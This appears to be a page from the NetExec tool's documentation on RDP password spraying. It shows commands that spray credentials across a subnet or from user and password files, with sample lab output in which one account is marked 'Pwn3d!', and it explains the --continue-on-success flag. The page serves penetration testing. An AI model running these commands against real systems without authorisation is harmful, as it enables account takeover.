Password Spraying

NetExec rdp 192.168.1.0/24 -u user -p password

NetExec rdp 192.168.133.157 -u ron -p October2021

RDP         192.168.133.157 3389   DC01             [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)

RDP         192.168.133.157 3389   DC01             [-] poudlard.wizard\ron:October2021

Check for credentials via RDP

NetExec rdp 192.168.133.157 -u rubeus -p October2021

RDP         192.168.133.157 3389   DC01             [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)

RDP         192.168.133.157 3389   DC01             [+] poudlard.wizard\rubeus:October2021 (Pwn3d!)

Password Spraying (without bruteforce)

NetExec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

PreviousRDP NextScreenshot

Last updated 8 months ago

hashtagPassword Spraying

hashtagPassword Spraying (without bruteforce)

hashtagBy default nxc will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Useful for spraying a single password against a large user list.

Password Spraying

Password Spraying (without bruteforce)

By default nxc will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Useful for spraying a single password against a large user list.